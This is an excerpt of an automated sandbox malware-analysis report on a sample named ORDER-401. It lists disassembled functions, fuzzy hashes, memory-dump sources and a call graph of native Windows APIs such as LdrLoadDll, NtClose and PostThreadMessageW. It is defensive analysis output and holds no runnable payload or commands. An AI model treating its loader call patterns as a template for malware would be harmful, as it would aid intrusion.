                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b0ba0cfa9e08c55e73c430f60a7d4e19d04e85682f43fe50a99f7e8784c99564
                                                                    • Instruction ID: baa1a430076e071e6e50fba739f16eb6e86972a39f34dfa9c44de77ad52b7b2b
                                                                    • Opcode Fuzzy Hash: b0ba0cfa9e08c55e73c430f60a7d4e19d04e85682f43fe50a99f7e8784c99564
                                                                    • Instruction Fuzzy Hash: DCD02BB21181947FCA02ABA4DC40DD3BFAE9F46558F08C0B6F1048B122D216D432D7D2
                                                                    Function 07CB8E10 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ae489cd5ac2251b9a7c764f4ef3437e6f296c783b436c0a051470520aa32db16
                                                                    • Instruction ID: 82a3e6d08ee9021f5257132caeff9b4cb9eb5db8c626a47b701a6a3129657e0c
                                                                    • Opcode Fuzzy Hash: ae489cd5ac2251b9a7c764f4ef3437e6f296c783b436c0a051470520aa32db16
                                                                    • Instruction Fuzzy Hash: F4E0B6B4D40209DFD750EFBAC905A9EBBF4BF08210F15C5A9D019E7211E7B496048F91
                                                                    Function 07CB8339 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eb18c7039a2b3a196b252a26b0e158f6a7fd7e1fc76b5035cc2f75937baee4d3
                                                                    • Instruction ID: 52ac76e4f4fc3ab0e8de8d26366d72158cd0ed615c10af3f025d2a8f20ee0aad
                                                                    • Opcode Fuzzy Hash: eb18c7039a2b3a196b252a26b0e158f6a7fd7e1fc76b5035cc2f75937baee4d3
                                                                    • Instruction Fuzzy Hash: 41D02BE010D2CA8FD723436054A87C13F9C3F47150F4800EFE88287093DA14C684E753
                                                                    Function 07CBC1F8 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 225a057b287a4a81e93cf76d37b86029f9793e925d851ab356b4fed54fed05e4
                                                                    • Instruction ID: 838a7e8a8e86ce3f19249c5ebc9d12599e1d134feba243bb4ee6f5703b350a52
                                                                    • Opcode Fuzzy Hash: 225a057b287a4a81e93cf76d37b86029f9793e925d851ab356b4fed54fed05e4
                                                                    • Instruction Fuzzy Hash: 06D05EA509D1C95BC7010674EE2E3987F20AA93206B18019EE84886493C9268499DB91
                                                                    Function 07CB6883 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0190f1e168832825ffdefdd24bbb434a36a61e65b49e6716970c6658b011382d
                                                                    • Instruction ID: afeda0b5a2af419727bed62c587068f799da3498fce0e0a51694d0c955278a93
                                                                    • Opcode Fuzzy Hash: 0190f1e168832825ffdefdd24bbb434a36a61e65b49e6716970c6658b011382d
                                                                    • Instruction Fuzzy Hash: AAD05E2425D2E00FCB4693B4682E75A3E609F82511F0401BBE4CAC73C3DE288445C273
                                                                    Function 07CBC526 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 98aaaed42a7a4d81642cc1aaba7ecc5509649a6f000693df4d20795878d5375b
                                                                    • Instruction ID: 964ca848e472528cb09f932ab2064384f1e3a40711ce535be995ef5f030ba652
                                                                    • Opcode Fuzzy Hash: 98aaaed42a7a4d81642cc1aaba7ecc5509649a6f000693df4d20795878d5375b
                                                                    • Instruction Fuzzy Hash: 05D0523591121ACFEB20CB19EC80BECBBB8FB88225F0062E1E00D93600CB301A848F11
                                                                    Function 07CB8F08 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d0786a292e3dc1d1b56495d2aebb4cfccc3f114e317fd9b15ac8fa1f03f81994
                                                                    • Instruction ID: 5ec4ad046981c4f63aefb6d39c161b93bcfada52139f2a4f4aea193d27097f25
                                                                    • Opcode Fuzzy Hash: d0786a292e3dc1d1b56495d2aebb4cfccc3f114e317fd9b15ac8fa1f03f81994
                                                                    • Instruction Fuzzy Hash: 64D0123229020DDF5B50FEA5E840D97BBDDBB24700740C562F504C7020E631F565EB91
                                                                    Function 07CB4EB0 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a46c172fa350423e0ec70d314961042b6b7217d4e76d05572afc511307ce9eef
                                                                    • Instruction ID: e395e69d737426dafd4a626095d502193c0c7b9bc309eecb389cefa0afd00c30
                                                                    • Opcode Fuzzy Hash: a46c172fa350423e0ec70d314961042b6b7217d4e76d05572afc511307ce9eef
                                                                    • Instruction Fuzzy Hash: 1BD022F062E3D18ECB7A06B46C402817B306F13022B0A11C3F041CB0F3E7928720E322
                                                                    Function 07CB0BD8 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1ee44bba3bde1158578db40c38daff3e06c8cd437e0adc6f22b81041c2910b02
                                                                    • Instruction ID: 7e4708a45dc318779102fc890781b200c343d11daa7400e86323636f5925a338
                                                                    • Opcode Fuzzy Hash: 1ee44bba3bde1158578db40c38daff3e06c8cd437e0adc6f22b81041c2910b02
                                                                    • Instruction Fuzzy Hash: 1CC01232100018BB4A01AB85D800CC7BBADAF49654714C056F5088B121D622E55697D1
                                                                    Function 07CB6CF0 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 280af69da64730c79bda1c8d82025b0f6f6a1701fc3b7c99d53acd66ce1b3093
                                                                    • Instruction ID: c03c345d1d4703e43d92728e07e841eb3bb9f17fdd0eade084b237b9d0a4887e
                                                                    • Opcode Fuzzy Hash: 280af69da64730c79bda1c8d82025b0f6f6a1701fc3b7c99d53acd66ce1b3093
                                                                    • Instruction Fuzzy Hash: 18C02BAF3BC05162E20272B0CD037699983C332785F84C0387104C11C3CF15C632A063
                                                                    Function 07CB6890 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b7c9ff26677ac23f0a9c7b41d0a27e5045bc8ef059c8900a22a2e8a1efc7bae
                                                                    • Instruction ID: ae0e4867874ae2dc55db0f872363fccc162d31ab4edcb48e49a91288692c3d09
                                                                    • Opcode Fuzzy Hash: 2b7c9ff26677ac23f0a9c7b41d0a27e5045bc8ef059c8900a22a2e8a1efc7bae
                                                                    • Instruction Fuzzy Hash: 25C08C283103080BDB8422B5B40E72A7AEAABC4A21F105424F84B873C7EE768881C231
                                                                    Function 07CBC208 Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cdb226633fade1e41d0818296cea37d299e21f0353029f160217e02c22994117
                                                                    • Instruction ID: c9d8e485a990cd6d7a7dcdc48cf064d4407b3bb330deaf469a6015d6b13849ba
                                                                    • Opcode Fuzzy Hash: cdb226633fade1e41d0818296cea37d299e21f0353029f160217e02c22994117
                                                                    • Instruction Fuzzy Hash: 14C04CB50A670C97E73467E4F54E3687B68B74620AF442124F509418608EB45492CEB6
                                                                    Function 07CB4D12 Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bbace47ae91e6af086020c03bd7bc25fe313d6056fd8b593078e1b33cc29a6ed
                                                                    • Instruction ID: 84b95f38ed63518d0393d02f1ef8c4f109493e0ac3b41a6a43d6657636115e35
                                                                    • Opcode Fuzzy Hash: bbace47ae91e6af086020c03bd7bc25fe313d6056fd8b593078e1b33cc29a6ed
                                                                    • Instruction Fuzzy Hash: A2C092252261044FEF5842A4DD5F76A6B16E781718F78803051A2AABC6CC99C4534651
                                                                    Function 07CB4FAC Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 53e7cfc5dc5f2f701247dec1f1afc9d947000cb5c38e0b88867e78455ad8c84e
                                                                    • Instruction ID: b55cd542cec1f8606204e0c6cbbb77c6376ff757796b446ff316172a0021f894
                                                                    • Opcode Fuzzy Hash: 53e7cfc5dc5f2f701247dec1f1afc9d947000cb5c38e0b88867e78455ad8c84e
                                                                    • Instruction Fuzzy Hash: 42B014753D4340F3501551F44D5475FD75177D3700FD0CC05714510001C7105434D11F
                                                                    Function 07CBE088 Relevance: .0, Instructions: 7COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a0d0468f410eeb38c97153463a92cc308dc3ebc9b1be67258e05e7297de946a
                                                                    • Instruction ID: 56d7cdd40049abc525eccef0f9b882fe1e6aacf3dfa7488c52b300500d1b2ad5
                                                                    • Opcode Fuzzy Hash: 2a0d0468f410eeb38c97153463a92cc308dc3ebc9b1be67258e05e7297de946a
                                                                    • Instruction Fuzzy Hash: 3BC04CB4910259CBCB148F90CD45BDD7F72EB4A321F105085E90A33254CB315DD5CF54

                                                                    Non-executed Functions

                                                                    Function 07CB9298 Relevance: .3, Instructions: 340COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9a265feb90293781326b5d9aadf45fbc25746a0277a80d7ffe257f07136533ab
                                                                    • Instruction ID: a47cee899990f7e924290fcbfd9e902ef3bd7c55e5bab33b9a600015f4394e7a
                                                                    • Opcode Fuzzy Hash: 9a265feb90293781326b5d9aadf45fbc25746a0277a80d7ffe257f07136533ab
                                                                    • Instruction Fuzzy Hash: B3C1BCB17007058FDB25EB75C890BAE77FAAF89700F14446DE24A8B291DF35E906CB51
                                                                    Function 02A7CD24 Relevance: .3, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49264aea51d99913e210bc3fdb9b92cb1759396805d96facd758dbd4bea7295f
                                                                    • Instruction ID: 69f70ae45967e5bc49fe8247fb73cee2ccd0baa1c934426498707fbd054bc7df
                                                                    • Opcode Fuzzy Hash: 49264aea51d99913e210bc3fdb9b92cb1759396805d96facd758dbd4bea7295f
                                                                    • Instruction Fuzzy Hash: F7A15C32E10205CFCF15DFA4CA805AEBBB2FF85304B1545AAE905AB261DF31E956CF54

                                                                    Execution Graph

                                                                    Execution Coverage:1.2%
                                                                    Dynamic/Decrypted Code Coverage:5%
                                                                    Signature Coverage:8.6%
                                                                    Total number of Nodes:139
                                                                    Total number of Limit Nodes:12
                                                                    execution_graph 91249 42fa63 91250 42fa73 91249->91250 91251 42fa79 91249->91251 91254 42eaa3 91251->91254 91253 42fa9f 91257 42cc63 91254->91257 91256 42eabb 91256->91253 91258 42cc7d 91257->91258 91259 42cc8b RtlAllocateHeap 91258->91259 91259->91256 91260 4250a3 91265 4250bc 91260->91265 91261 425149 91262 425104 91268 42e9c3 91262->91268 91265->91261 91265->91262 91266 425144 91265->91266 91267 42e9c3 RtlFreeHeap 91266->91267 91267->91261 91271 42cca3 91268->91271 91270 425114 91272 42ccbd 91271->91272 91273 42cccb RtlFreeHeap 91272->91273 91273->91270 91361 424d13 91362 424d2f 91361->91362 91363 424d57 91362->91363 91364 424d6b 91362->91364 91365 42c953 NtClose 91363->91365 91366 42c953 NtClose 91364->91366 91367 424d60 91365->91367 91368 424d74 91366->91368 91371 42eae3 RtlAllocateHeap 91368->91371 91370 424d7f 91371->91370 91372 42bfb3 91373 42bfcd 91372->91373 91376 1582df0 LdrInitializeThunk 91373->91376 91374 42bff2 91376->91374 91377 41b653 91378 41b697 91377->91378 91379 41b6b8 91378->91379 91380 42c953 NtClose 91378->91380 91380->91379 91381 41a8f3 91382 41a90b 91381->91382 91384 41a962 91381->91384 91382->91384 91385 41e833 91382->91385 91386 41e859 91385->91386 91390 41e94d 91386->91390 91391 42fb93 91386->91391 91388 41e8eb 91389 42c003 LdrInitializeThunk 91388->91389 91388->91390 91389->91390 91390->91384 91392 42fb03 91391->91392 91393 42eaa3 RtlAllocateHeap 91392->91393 91394 42fb60 91392->91394 91395 42fb3d 91393->91395 91394->91388 91396 42e9c3 RtlFreeHeap 91395->91396 91396->91394 91397 4143b3 91398 4143cd 91397->91398 91403 417b63 91398->91403 91400 4143e8 91401 41441c PostThreadMessageW 91400->91401 91402 41442d 91400->91402 91401->91402 91405 417b87 91403->91405 91404 417b8e 91404->91400 91405->91404 91406 417bda 91405->91406 91407 417bca LdrLoadDll 91405->91407 91406->91400 91407->91406 91408 1582b60 LdrInitializeThunk 91409 4190f8 91410 42c953 NtClose 91409->91410 91411 419102 91410->91411 91274 40192a 91276 40192e 91274->91276 91275 40198b 91276->91275 91279 42ff33 91276->91279 91277 401a50 91277->91277 91282 42e573 91279->91282 91283 42e599 91282->91283 91294 407403 91283->91294 91285 42e5af 91293 42e60b 91285->91293 91297 41b463 91285->91297 91287 42e5e3 91308 428563 91287->91308 91288 42e5ce 91288->91287 91312 42cce3 91288->91312 91291 42e5fd 91292 42cce3 ExitProcess 91291->91292 91292->91293 91293->91277 91315 416823 91294->91315 91296 407410 91296->91285 91298 41b48f 91297->91298 91333 41b353 91298->91333 91301 41b4d4 91303 41b4f0 91301->91303 91306 42c953 NtClose 91301->91306 91302 41b4bc 91304 41b4c7 91302->91304 91339 42c953 91302->91339 91303->91288 91304->91288 91307 41b4e6 91306->91307 91307->91288 91309 4285c5 91308->91309 91311 4285d2 91309->91311 91347 4189c3 91309->91347 91311->91291 91313 42cd00 91312->91313 91314 42cd11 ExitProcess 91313->91314 91314->91287 91316 416840 91315->91316 91318 416853 91316->91318 91319 42d393 91316->91319 91318->91296 91321 42d3ad 91319->91321 91320 42d3dc 91320->91318 91321->91320 91326 42c003 91321->91326 91324 42e9c3 RtlFreeHeap 91325 42d452 91324->91325 91325->91318 91327 42c01d 91326->91327 91330 1582c0a 91327->91330 91328 42c046 91328->91324 91331 1582c1f LdrInitializeThunk 91330->91331 91332 1582c11 91330->91332 91331->91328 91332->91328 91334 41b36d 91333->91334 91338 41b449 91333->91338 91342 42c093 91334->91342 91337 42c953 NtClose 91337->91338 91338->91301 91338->91302 91340 42c96d 91339->91340 91341 42c97b NtClose 91340->91341 91341->91304 91343 42c0b0 91342->91343 91346 15835c0 LdrInitializeThunk 91343->91346 91344 41b43d 91344->91337 91346->91344 91349 4189ed 91347->91349 91348 418edb 91348->91311 91349->91348 91355 414033 91349->91355 91351 418b0e 91351->91348 91352 42e9c3 RtlFreeHeap 91351->91352 91353 418b26 91352->91353 91353->91348 91354 42cce3 ExitProcess 91353->91354 91354->91348 91359 414050 91355->91359 91357 4140ac 91357->91351 91358 4140b6 91358->91351 91359->91358 91360 41b773 RtlFreeHeap LdrInitializeThunk 91359->91360 91360->91357 91412 413ebc 91413 413e64 91412->91413 91414 413ed0 91412->91414 91417 42cbd3 91413->91417 91418 42cbed 91417->91418 91421 1582c70 LdrInitializeThunk 91418->91421 91419 413e75 91421->91419

                                                                    Executed Functions

                                                                    Function 00417B63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 388 417b63-417b7f 389 417b87-417b8c 388->389 390 417b82 call 42f5a3 388->390 391 417b92-417ba0 call 42fba3 389->391 392 417b8e-417b91 389->392 390->389 395 417bb0-417bc1 call 42e043 391->395 396 417ba2-417bad call 42fe43 391->396 401 417bc3-417bd7 LdrLoadDll 395->401 402 417bda-417bdd 395->402 396->395 401->402
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                                    • Instruction ID: 122384901a9c5e31b0cbf47cd83ed5cb9323d92cb62f98cf8b450b2778bc3db3
                                                                    • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                                    • Instruction Fuzzy Hash: D60171B1E0420DBBDF10DBE1DC42FDEB3789B14308F4081AAE90897241F639EB588B95
                                                                    Function 0042C953 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 414 42c953-42c989 call 404643 call 42db53 NtClose
                                                                    APIs
                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                                    • Instruction ID: a1a1041c0e6c1b94269db6ff4cf73d3451205fe7691f058a31b8fa4964ffe1e3
                                                                    • Opcode Fuzzy Hash: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                                    • Instruction Fuzzy Hash: 2EE08676300614BBD510FA5ADC01F97775CEFC6714F404419FA4867341D675B91487F4
                                                                    Function 01582B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 65b415aab7c2bf7707b1e0ad67c6c16991fec1d72c4f93c1c66dae2320be152d
                                                                    • Instruction ID: 77aaca71c07c2ec06baa79c4a955283bb0a4d4a2b0531fb24031a1376af0f691
                                                                    • Opcode Fuzzy Hash: 65b415aab7c2bf7707b1e0ad67c6c16991fec1d72c4f93c1c66dae2320be152d
                                                                    • Instruction Fuzzy Hash: E090026120240403460571584414616404AA7E1211B59C421E1018990DC5698991622A
                                                                    Function 01582DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 888adcb7d2f32070792ced919f9465ac858e2d0e4a8a15439247ded0e1105206
                                                                    • Instruction ID: 14c211cdd0e54df4609b729290b32e59c6985d1c28dc11189a45db6fdc258ef3
                                                                    • Opcode Fuzzy Hash: 888adcb7d2f32070792ced919f9465ac858e2d0e4a8a15439247ded0e1105206
                                                                    • Instruction Fuzzy Hash: 6190023120140813D611715845047070049A7D1251F99C812A0428958DD69A8A52A226
                                                                    Function 01582C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5777cfa3ee9d019639b99118aab6af48e876c1744415806dfd78a396e50e7bf2
                                                                    • Instruction ID: 9631fd48d94e3fb3149e86bb8db8b9b88721f7db48a5756e0878060c203b2038
                                                                    • Opcode Fuzzy Hash: 5777cfa3ee9d019639b99118aab6af48e876c1744415806dfd78a396e50e7bf2
                                                                    • Instruction Fuzzy Hash: E290023120148C02D6107158840474A0045A7D1311F5DC811A4428A58DC6D989917226
                                                                    Function 015835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9b9a8cb96f18cc93c3679b70268c9107fbb37fb0aa87e442b0f8b174caa3bf79
                                                                    • Instruction ID: 113fe7113e44149963bc014ce1ef54f2e7828f48b6c86a32aec37e6ca98c7992
                                                                    • Opcode Fuzzy Hash: 9b9a8cb96f18cc93c3679b70268c9107fbb37fb0aa87e442b0f8b174caa3bf79
                                                                    • Instruction Fuzzy Hash: AF90023160550802D600715845147061045A7D1211F69C811A0428968DC7D98A5166A7
                                                                    Function 00414320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                                    • API String ID: 1836367815-2341035416
                                                                    • Opcode ID: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                                    • Instruction ID: c654e7dd82306ad07be20f2182398129074d27dccdf197e7b8b500296daea260
                                                                    • Opcode Fuzzy Hash: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                                    • Instruction Fuzzy Hash: 6A21F972E4421C7EEB01AE959C82DEF7B7CEF40798B40816AF904A7241D6389E1687E5
                                                                    Function 004143A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                                    • API String ID: 1836367815-2341035416
                                                                    • Opcode ID: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
